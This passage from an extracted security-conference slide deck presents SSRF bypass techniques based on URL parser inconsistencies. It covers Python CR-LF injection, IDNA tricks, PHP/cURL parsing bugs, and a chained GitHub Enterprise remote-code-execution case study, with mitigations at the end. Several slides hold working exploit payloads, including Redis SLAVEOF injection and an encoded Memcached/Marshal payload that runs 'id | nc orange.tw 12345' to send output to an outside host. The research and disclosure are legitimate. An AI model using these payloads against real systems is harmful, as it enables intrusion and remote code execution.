- 59. Break the Patchof Python CVE-2016-5699 CR-LF Injection in HTTPConnection.putheader() Space followed by CR-LF? Bypass with a leading space >>> import urllib >>> url = 'http://0rn SLAVEOF orange.tw 6379rn :80' >>> urllib.urlopen(url) GLibc NSS Features
- 60. Break the Patchof Python CVE-2016-5699 Exploit with a leading space Thanks to Redis and Memcached GLibc NSS Features http://0rn SLAVEOF orange.tw 6379rn :6379/ >> GET / HTTP/1.0 << -ERR wrong number of arguments for 'get' command >> Host: 0 << -ERR unknown command 'Host:' >> SLAVEOF orange.tw 6379 << +OK Already connected to specified master
- 61. Abusing IDNA Standard Theproblem relied on URL parser and URL requester use different IDNA standard IDNA2003 UTS46 IDNA2008 ⓖⓞⓞⓖⓛⓔ.com google.com google.com Invalid gu200Doogle.com google.com google.com xn--google-pf0c.com baß.de bass.de bass.de xn--ba-hia.de
- 62. Abusing IDNA Standard >>"ß".toLowerCase() "ß" >> "ß".toUpperCase() "SS" >> ["ss", "SS"].indexOf("ß") false >> location.href = "http://wordpreß.com" The problem relied on URL parser and URL requester use different IDNA standard
- 63.
- 64. Abusing URL Parsers- Case Study WordPress 1. Paid lots of attentions on SSRF protections 2. We found 3 distinct ways to bypass the protections 3. Bugs have been reported since Feb. 25, 2017 but still unpatched 4. For the Responsible Disclosure Process, I will use MyBB as following case study
- 65. Abusing URL Parsers- Case Study The main concept is finding different behaviors among URL parser, DNS checker and URL requester URL parser DNS checker URL requester WordPress parse_url() gethostbyname() *cURL vBulletin parse_url() None *cURL MyBB parse_url() gethostbynamel() *cURL * First priority
- 66. Abusing URL Parsers- Case Study SSRF-Bypass tech #1 Time-of-check to Time-of-use problem 1 $url_components = @parse_url($url); 2 if( 3 !$url_components || 4 empty($url_components['host']) || 5 (!empty($url_components['scheme']) && !in_array($url_components['scheme'], array('http', 'https'))) || 6 (!empty($url_components['port']) && !in_array($url_components['port'], array(80, 8080, 443))) 7 ) { return false; } 8 9 $addresses = gethostbynamel($url_components['host']); 10 if($addresses) { 11 // check addresses not in disallowed_remote_addresses 12 } 13 14 $ch = curl_init(); 15 curl_setopt($ch, CURLOPT_URL, $url); 16 curl_exec($ch);
- 67. Abusing URL Parsers- Case Study 1. gethostbyname() and get 1.2.3.4 2. Check 1.2.3.4 not in blacklist 3. Fetch URL by curl_init() and cURL query DNS again! 4. 127.0.0.1 fetched, SSRF! Q: foo.orange.tw A: 1.2.3.4 Q: foo.orange.tw A: 127.0.0.1 http://foo.orange.tw/ Hacker MyBB DNS 1 2 4 3
- 68. Abusing URL Parsers- Case Study SSRF-Bypass tech #2 The inconsistency between DNS checker and URL requester There is no IDNA converter in gethostbynamel(), but cURL has 1 $url = 'http://ß.orange.tw/'; // 127.0.0.1 2 3 $host = parse_url($url)[host]; 4 $addresses = gethostbynamel($host); // bool(false) 5 if ($address) { 6 // check if address in white-list 7 } 8 9 $ch = curl_init(); 10 curl_setopt($ch, CURLOPT_URL, $url); 11 curl_exec($ch);
- 69. Abusing URL Parsers- Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in PHP 7.0.13 …127.0.0.1:11211 fetched $url = 'http://127.0.0.1:11211#@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url);
- 70. Abusing URL Parsers- Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1) $url = 'http://foo@127.0.0.1:11211@google.com:80/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(80) curl($url); …127.0.0.1:11211 fetched
- 71. Abusing URL Parsers- Case Study SSRF-Bypass tech #3 The inconsistency between URL parser and URL requester cURL won't fix :) $url = 'http://foo@127.0.0.1 @google.com:11211/'; $parsed = parse_url($url); var_dump($parsed[host]); // string(10) "google.com" var_dump($parsed[port]); // int(11211) curl($url); …127.0.0.1:11211 fetched
- 72. Protocol Smuggling -Case Study GitHub Enterprise Standalone version of GitHub Written in Ruby on Rails and code have been obfuscated
- 73. Protocol Smuggling -Case Study About Remote Code Execution on GitHub Enterprise Best report in GitHub 3rd Bug Bounty Anniversary Promotion! Chaining 4 vulnerabilities into RCE
- 74. Protocol Smuggling -Case Study First bug - SSRF-Bypass on Webhooks What is Webhooks?
- 75. Protocol Smuggling -Case Study First bug - SSRF-Bypass on Webhooks Fetching URL by gem faraday Blacklisting Host by gem faraday-restrict-ip-addresses Blacklist localhost, 127.0.0.1… ETC Simply bypassed with a zero http://0/
- 76. Protocol Smuggling -Case Study First bug - SSRF-Bypass on Webhooks There are several limitations in this SSRF Not allowed 302 redirection Not allowed scheme out of HTTP and HTTPS No CR-LF Injection in faraday Only POST method
- 77. Protocol Smuggling -Case Study Second bug - SSRF in internal Graphite service GitHub Enterprise uses Graphite to draw charts Graphite is bound on 127.0.0.1:8000 url = request.GET['url'] proto, server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse()
- 78.
- 79. Protocol Smuggling -Case Study Third bug - CR-LF Injection in Graphite Graphite is written in Python The implementation of the second SSRF is httplib.HTTPConnection As I mentioned before, httplib suffers from CR-LF Injection We can smuggle other protocols with URL http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:6379/%0D%0ASET…
- 80. Protocol Smuggling -Case Study Fourth bug - Unsafe Marshal in Memcached gem GitHub Enterprise uses Memcached gem as the cache client All Ruby objects stored in cache will be Marshal-ed
- 81. Protocol Smuggling -Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
- 82. Protocol Smuggling -Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data
- 83. Protocol Smuggling -Case Study http://0:8000/composer/send_email ?to=orange@chroot.org &url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation %3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB %07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A %06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A First SSRF Second SSRF Memcached protocol Marshal data $12,500
- 84. Demo GitHub Enterprise <2.8.7 Remote Code Execution https://youtu.be/GoO7_lCOfic
- 85. Mitigations Application layer Use theonly IP and hostname, do not reuse the input URL Network layer Using Firewall or NetWork Policy to block Intranet traffics Projects SafeCurl by @fin1te Advocate by @JordanMilne
- 86. Summary New Attack Surfaceon SSRF-Bypass URL Parsing Issues Abusing IDNA Standard New Attack Vector on Protocol Smuggling Linux Glibc NSS Features NodeJS Unicode Failure Case Studies
- 87. Further works URL parserissues in OAuth URL parser issues in modern browsers URL parser issues in Proxy server …
- 88. Acknowledgements 1. Invalid URLparsing with '#' by @bagder 2. URL Interop by @bagder 3. Shibuya.XSS #8 by @mala 4. SSRF Bible by @Wallarm 5. Special Thanks Allen Own Birdman Chiu Henry Huang
- 89.
- 90.